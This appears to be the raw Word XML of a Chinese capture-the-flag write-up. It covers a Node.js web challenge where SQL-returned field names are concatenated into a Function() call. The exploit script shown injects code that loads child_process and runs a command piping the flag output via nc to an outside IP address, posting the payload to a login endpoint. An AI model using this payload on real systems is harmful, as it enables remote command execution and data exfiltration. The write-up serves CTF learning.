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65CE3" w14:textId="70369DA7" w:rsidR="00437A38" w:rsidRDefault="006641FA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>韩磊</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00A27378">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>1504895347@qq.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FAE23DC" w14:textId="77777777" w:rsidR="006641FA" w:rsidRDefault="006641FA"/>
    <w:p w14:paraId="38CD18E2" w14:textId="267CD7DB" w:rsidR="006641FA" w:rsidRDefault="006641FA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web: 这题我出不了了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF1807" w14:textId="77777777" w:rsidR="00BA03F5" w:rsidRDefault="00BA03F5"/>
    <w:p w14:paraId="5902D39D" w14:textId="0AAC25D1" w:rsidR="00BA03F5" w:rsidRDefault="00BA03F5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1934DDDB" w14:textId="56B9FE51" w:rsidR="00BA03F5" w:rsidRDefault="00BA03F5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入网站提示我们有秘密，发现是一点源码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158BFF41" w14:textId="64010257" w:rsidR="00BA03F5" w:rsidRDefault="00BA03F5">
      <w:r w:rsidRPr="00BA03F5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C3B221" wp14:editId="5608E89C">
            <wp:extent cx="5274310" cy="1984375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="453395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303" w14:textId="6309402C" w:rsidR="00BA03F5" w:rsidRDefault="00BA03F5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台用node.js写的，和数据库进行连接，并加了巨几把多的waf，下面还有base64加密后的内容，解密看看：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BADD001" w14:textId="210C38D0" w:rsidR="00BA03F5" w:rsidRDefault="00BA03F5">
      <w:r w:rsidRPr="00BA03F5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CEC4400" wp14:editId="568A3896">
            <wp:extent cx="5274310" cy="1950085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1674049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9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71A3" w14:textId="537A50FA" w:rsidR="00CA6D69" w:rsidRDefault="00BA03F5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试一下访问/printFlag路由，发现啥都没有，可能需要内网访问。</w:t>
      </w:r>
      <w:r w:rsidR="00CA6D69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那Flag有出处了，不在数据库里，就不是数据库注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1DAEE2" w14:textId="4704B596" w:rsidR="00BA03F5" w:rsidRDefault="00CA6D69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了数据库注入之外，又和</w:t>
      </w:r>
      <w:r w:rsidR="00BA03F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nodejs组合起来，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那就</w:t>
      </w:r>
      <w:r w:rsidR="00BA03F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非常的像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nodejs注入导致的命令执行漏洞，具体逻辑是通过数据库查询语句放回字段名，node后端将字段名经过不完整的转义拼接到Function中导致命令执行，常见为xss执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7252C8" w14:textId="77777777" w:rsidR="00CA6D69" w:rsidRDefault="00CA6D69"/>
    <w:p w14:paraId="099615ED" w14:textId="1D152992" w:rsidR="00FC16B2" w:rsidRPr="0084281E" w:rsidRDefault="00CA6D69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在此之前，还有个注册界面，随便注册一个nebu,123456，试着访问/login路由</w:t>
      </w:r>
      <w:r w:rsidR="0084281E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,发现有这个路由，那么就应该是在这注入了，注入脚本是</w:t>
      </w:r>
      <w:r w:rsidR="00FC16B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>orange</w:t>
      </w:r>
      <w:r w:rsidR="00FC16B2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="00FC16B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r w:rsidR="00FC16B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分享的</w:t>
      </w:r>
      <w:r w:rsidR="00FC16B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BCC70D" w14:textId="504DE32D" w:rsidR="00FC16B2" w:rsidRDefault="00FC16B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Exp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531AA2C9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randint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE3E225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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24677937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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>po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{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"http"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C16B2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"https"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FC16B2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0A1E94E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"""','')/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC16B2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*/returning(1)as"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC16B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'/*",(1)as"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC16B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'*/-(a=`child_process`)/*",(2)as"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC16B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'*/-(b=`/printFlag|nc 47.113.177.51 5555`)/*",(3)as"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC16B2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'*/-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lastRenderedPageBreak/>
        <w:t>console.log(process.mainModule.require(a).exec(b))]=1//"--"""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E802343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randint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C16B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randint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))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C16B2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randint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16B2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>65535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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D59796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1250B97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'username'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username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</w:p>
    <w:p w14:paraId="753A7F3C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'password'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'AAAAAA'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603029C4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2BF1F8B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'ok'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929DB14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C16B2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>requests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C16B2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CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'http://101.200.138.180:32031/login'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proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC16B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po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5C68854" w14:textId="77777777" w:rsidR="00FC16B2" w:rsidRPr="00FC16B2" w:rsidRDefault="00FC16B2" w:rsidP="00FC16B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16B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C16B2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FC16B2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601A4C8" w14:textId="77777777" w:rsidR="00FC16B2" w:rsidRDefault="00FC16B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FC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D8D51" w14:textId="77777777" w:rsidR="00113A81" w:rsidRDefault="00113A81" w:rsidP="006641FA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B7DB934" w14:textId="77777777" w:rsidR="00113A81" w:rsidRDefault="00113A81" w:rsidP="0066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B6EA2" w14:textId="77777777" w:rsidR="00113A81" w:rsidRDefault="00113A81" w:rsidP="006641FA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C9FEF52" w14:textId="77777777" w:rsidR="00113A81" w:rsidRDefault="00113A81" w:rsidP="00664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2C"/>
    <w:rsid w:val="00086BA0"/>
    <w:rsid w:val="00113A81"/>
    <w:rsid w:val="00437A38"/>
    <w:rsid w:val="00464929"/>
    <w:rsid w:val="0055632C"/>
    <w:rsid w:val="006641FA"/>
    <w:rsid w:val="0084281E"/>
    <w:rsid w:val="00BA03F5"/>
    <w:rsid w:val="00CA6D69"/>
    <w:rsid w:val="00FC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1356C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FA7EA2E9-E874-48CA-9278-E5F6CAE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1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1FA"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006641FA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4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04895347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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-23T13:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-23T14:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>